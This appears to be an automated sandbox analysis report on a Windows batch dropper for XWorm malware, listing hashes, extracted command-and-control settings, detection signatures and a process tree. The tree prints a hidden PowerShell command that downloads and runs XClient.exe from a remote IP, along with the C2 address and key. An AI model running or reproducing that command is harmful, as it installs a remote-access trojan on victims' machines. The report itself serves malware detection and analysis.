Resubmissions
24-01-2025 12:21
250124-pjmz3azkaq 624-01-2025 12:20
250124-ph5hqazjhk 1024-01-2025 12:01
250124-n62lasyndm 424-01-2025 12:00
250124-n6gwwsxmas 1024-01-2025 11:33
250124-npc7dawpay 524-01-2025 11:20
250124-nfkvvsxlan 10Analysis
-
max time kernel
20s -
max time network
21s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
24-01-2025 11:20
Static task
static1
General
-
Target
RuhsatBelgesi12ACE575 FORDKUNGA.bat
-
Size
1KB
-
MD5
be7fa3571d22850513b226ec24eef667
-
SHA1
4329266e1030c80af32a87387aa08afa1982ca8b
-
SHA256
83ac2825a5a6f97df1268c60d014182ed4be1c0088de5a8b9527a68556354570
-
SHA512
34e46f4a7318e1dd24909d139dd1c76b2b31f4ce1bcb4ee4a6c692d0fcbe45cfdb1a487a16d1242a536c44aaf8f3656981a0026d143e71bf951270774a067b0f
Malware Config
Extracted
http://45.32.153.7/filezilla/ftp/htp/xd/yk/zp/XClient.exe
Extracted
xworm
5.0
45.32.153.7:7005
127.0.0.1:7005
1BGj20FVtOyvp4A2
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x001b00000002aad3-18.dat family_xworm behavioral1/memory/1040-20-0x0000000000450000-0x000000000045E000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 1 1872 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1872 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 1 1872 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1040 XClient.exe -
System Network Connections Discovery 1 TTPs 1 IoCs
Attempt to get a listing of network connections.
pid Process 1164 NETSTAT.EXE -
Delays execution with timeout.exe 1 IoCs
pid Process 2796 timeout.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 1164 NETSTAT.EXE -
Modifies registry class 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" BackgroundTransferHost.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1872 powershell.exe 1872 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1872 powershell.exe Token: SeDebugPrivilege 1040 XClient.exe Token: SeDebugPrivilege 1164 NETSTAT.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3108 wrote to memory of 1704 3108 cmd.exe 80 PID 3108 wrote to memory of 1704 3108 cmd.exe 80 PID 3108 wrote to memory of 1872 3108 cmd.exe 81 PID 3108 wrote to memory of 1872 3108 cmd.exe 81 PID 3108 wrote to memory of 1040 3108 cmd.exe 82 PID 3108 wrote to memory of 1040 3108 cmd.exe 82 PID 3108 wrote to memory of 2796 3108 cmd.exe 83 PID 3108 wrote to memory of 2796 3108 cmd.exe 83 PID 3108 wrote to memory of 1164 3108 cmd.exe 84 PID 3108 wrote to memory of 1164 3108 cmd.exe 84 PID 3108 wrote to memory of 4720 3108 cmd.exe 85 PID 3108 wrote to memory of 4720 3108 cmd.exe 85
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\RuhsatBelgesi12ACE575 FORDKUNGA.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3108 -
C:\Windows\system32\fsutil.exefsutil dirty query C:2⤵PID:1704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -c "(New-Object System.Net.WebClient).DownloadFile('http://45.32.153.7/filezilla/ftp/htp/xd/yk/zp/XClient.exe', 'C:\XClient.exe')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1872
-
-
C:\XClient.exe"C:\XClient.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1040
-
-
C:\Windows\system32\timeout.exetimeout /t 52⤵
- Delays execution with timeout.exe
PID:2796
-
-
C:\Windows\system32\NETSTAT.EXEnetstat -ano2⤵
- System Network Connections Discovery
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:1164
-
-
C:\Windows\system32\find.exefind "7000"2⤵PID:4720
-
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.131⤵
- Modifies registry class
PID:3576
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
32KB
MD5ba9f3ccb1f48af4e217e69a88c84f39c
SHA1b8e37cbe88d69a5a69ca5908cd8a26135e1d813a
SHA256ada132efdfa280b6748e110ce79743d17ee1059c014bf8189ec9be4c3db3d1cd
SHA512998022d2082e129293ee68f9acc3daf1efa2901c16a72312a01f7e816c69d26f8d8dd3cc7f470977d7bd00aa77133b7be6c62344fca434adf571f6faf8141716